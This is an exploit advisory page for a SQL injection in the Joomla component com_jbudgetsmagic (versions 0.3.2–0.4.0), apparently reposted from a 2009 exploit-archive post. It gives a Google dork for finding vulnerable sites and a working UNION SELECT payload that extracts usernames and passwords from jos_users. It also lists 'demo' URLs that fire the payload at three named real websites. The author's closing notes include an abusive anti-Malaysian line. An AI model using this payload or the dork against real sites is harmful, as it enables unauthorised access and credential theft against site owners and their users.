Joomla com_jbudgetsmagic (bid) Remote SQL Injection Vulnerability

2009-09-24 / 2009-09-25
Credit: kaMtiEz
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

############################################################################################################# ## Joomla com_jbudgetsmagic SQL injection vulnerability - (bid) ## ## Author : kaMtiEz (kamzcrew@gmail.com) ## ## Homepage : http://www.indonesiancoder.com ## ## Date : September 19, 2009 ## ############################################################################################################# ############################################################################################################# # /~~\__/~~\_/~~~~\_/~~\_______/~~\__________________/~~~~~\__ # # /~~\_/~~\___/~~\__/~~\_______/~~\_________________/~~\_/~~\_ # # /~~~~~\_____/~~\__/~~\_______/~~\_______/~~~~~~~\__/~~~~~\__ # # /~~\_/~~\___/~~\__/~~\_______/~~\____________________/~~\___ # # /~~\__/~~\_/~~~~\_/~~~~~~~~\_/~~~~~~~~\_____________/~~\____ # #____________________________________________________________ -=- KILL-9 CREW -=- INDONESIANCODER -=- # # # ############################################################################################################# [ Software Information ] [+] Vendor : http://www.sopinet.com/ [+] Download : http://www.sopinet.com/jbudgetsmagic/ [+] version : 0.3.2 - 0.4.0 [+] Vulnerability : SQL injection [+] Dork : inurl:"com_jbudgetsmagic" ############################################################################################################# [ Vulnerable File ] http://127.0.0.1/index.php?option=com_jbudgetsmagic&view=mybudget&bid=[SQL] [ Exploit ] 9999+union+select+1,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10+from+jos_users-- [ Demo ] http://www.graha-nusantara.com/index.php?option=com_jbudgetsmagic&view=mybudget&bid=9999+union+select+1,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10+from+jos_users-- http://www.styleprefabricados.com/index.php?option=com_jbudgetsmagic&view=mybudget&bid=9999+union+select+1,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10+from+jos_users-- http://www.joomlasitedesigner.com/index.php?option=com_jbudgetsmagic&view=mybudget&bid=9999+union+select+1,2,3,4,concat_ws%280x3a,username,password%29,6,7,8,9,10+from+jos_users-- ############################################################################################################# [ Thx TO ] [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW [+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h [+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz [+] Coracore,black666girl,NepT,ichal,tengik and YOU!! [ NOTE ] [+] Selamat Hari Raya Idul Fitri 1430 H [+] Minal aidzin Wal faidzin, Mohon Maaf Lahir Batin Maap Kalo ada salah2 kata mohon dimaafkan [+] terima kasih banget buat tukulesto dan arianom yang setiap malam menemani saya waktu exploit .. wkwkwkw [ QUOTE ] [+] Soekarno : Dengan ini saya menyatakan "GANYANG MALAYSIA" [+] FUCK MALAYSIA !!!

References:

http://www.securityfocus.com/bid/36461
http://www.milw0rm.com/exploits/9723


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top